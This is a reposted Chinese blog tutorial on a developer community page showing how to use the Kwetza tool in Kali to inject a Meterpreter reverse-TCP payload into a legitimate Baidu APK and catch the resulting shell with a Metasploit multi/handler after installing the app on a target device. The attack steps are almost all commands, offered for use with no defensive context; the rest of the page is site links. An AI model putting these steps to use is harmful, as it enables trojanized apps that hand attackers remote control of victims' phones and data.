备案控制台

开发者社区开发与运维文章正文

kali下Kwetza进行安卓APK文件恶意注入

2018-02-28 1706

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 版权声明：转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396584 ...

版权声明：转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396584

参考：https://www.youtube.com/watch?v=sP8CtMPAwzY
https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

cd /tmp
git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes
#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit

文章标签：

Android开发

Python

测试技术

关键词：

Android文件

Android APK

Android注入

安卓apk

apk安卓

z奶油面包

目录

相关文章

游客syv66y3m2ksnc

|

1月前

|

ARouter Android开发

Android不同module布局文件重名被覆盖

Android不同module布局文件重名被覆盖

游客syv66y3m2ksnc

100 0 0

阿迷创客

|

3月前

|

Java Android开发 C++

Android Studio JNI 使用模板：c/cpp源文件的集成编译，快速上手

本文提供了一个Android Studio中JNI使用的模板，包括创建C/C++源文件、编辑CMakeLists.txt、编写JNI接口代码、配置build.gradle以及编译生成.so库的详细步骤，以帮助开发者快速上手Android平台的JNI开发和编译过程。

阿迷创客

283 1 1

stefanie燕

|

1月前

|

ARouter Android开发

Android不同module布局文件重名被覆盖

Android不同module布局文件重名被覆盖

stefanie燕

119 0 0

阿迷创客

|

3月前

|

开发工具 git 索引

repo sync 更新源码 android-12.0.0_r34， fatal: 不能重置索引文件至版本 ‘v2.27^0‘。

本文描述了在更新AOSP 12源码时遇到的repo同步错误，并提供了通过手动git pull更新repo工具来解决这一问题的方法。

阿迷创客

132 1 1

阿迷创客

|

3月前

|

Java Android开发 Windows

使用keytool查看Android APK签名

本文介绍了如何使用Windows命令行工具和keytool查看APK的签名信息，并提供了使用AOSP环境中的signapk.jar工具对APK进行系统签名的方法。

阿迷创客

387 0 0

使用keytool查看Android APK签名

旺仔大牛

|

3月前

|

Android开发

将AAB(Android App Bundle)转换为APK

将AAB(Android App Bundle)转换为APK

旺仔大牛

251 1 1

旺仔大牛

|

3月前

|

Android开发开发者

Android、Flutter为不同的CPU架构包打包APK(v7a、v8a、x86)

Android、Flutter为不同的CPU架构包打包APK(v7a、v8a、x86)

旺仔大牛

295 1 1

旺仔大牛

|

3月前

|

Android开发

解决android apk安装后出现2个相同的应用图标

解决android apk安装后出现2个相同的应用图标

旺仔大牛

349 2 2

Ant.Dream

|

3月前

|

存储监控数据库

Android经典实战之OkDownload的文件分段下载及合成原理

本文介绍了 OkDownload，一个高效的 Android 下载引擎，支持多线程下载、断点续传等功能。文章详细描述了文件分段下载及合成原理，包括任务创建、断点续传、并行下载等步骤，并展示了如何通过多种机制保证下载的稳定性和完整性。

Ant.Dream

118 0 0

保山hh

|

4月前

|

Web App开发 JavaScript 前端开发

Android端使用WebView注入一段js代码实现js调用android

Android端使用WebView注入一段js代码实现js调用android

保山hh

125 0 0

热门文章

最新文章

Android签名包apk安装不上：INSTALL_PARSE_FAILED_NO_CERTIFICATES

Android ADB命令大全(通过ADB命令查看wifi密码、MAC地址、设备信息、操作文件、查看文件、日志信息、卸载、启动和安装APK等)

uni-app使用HBuilder X编辑器本地打包apk步骤说明

反编译Apk得到Java源代码

AutoJs4.1.0实战教程---js文件打包发布成APK文件

利用 Android Studio 和 Gradle 打包多版本APK

Android App 导出APK安装包以及制作App图标讲解及实战（图文解释简单易懂）

APK/ABB 包加固

Apk签名时报错Export aborted because fatal lint errors were found

Android应用开发：实现自定义View的高效绘制

构建高效Android应用：Kotlin协程的实践指南

jenkins编译H5做的android端编译卫士app记录

利用Bundle实现Android Activity间消息的传递

Intent在Android中的几种用法

Android如何在Activity和Service之间传递数据

android TextView HTML 的效果

Android下自定义Button样式

Android Launcher研究(二)-----------Launcher为何物，究竟是干什么

Android网络访问超时

相关课程

更多

开源Android容器化框架Atlas开发者指南

相关电子书

更多

58同城Android客户端Walle框架演进与实践之路

Android组件化实现

蚂蚁聚宝Android秒级编译——Freeline

相关实验场景

更多

1分钟代码漏洞自动检测

下一篇

无影云桌面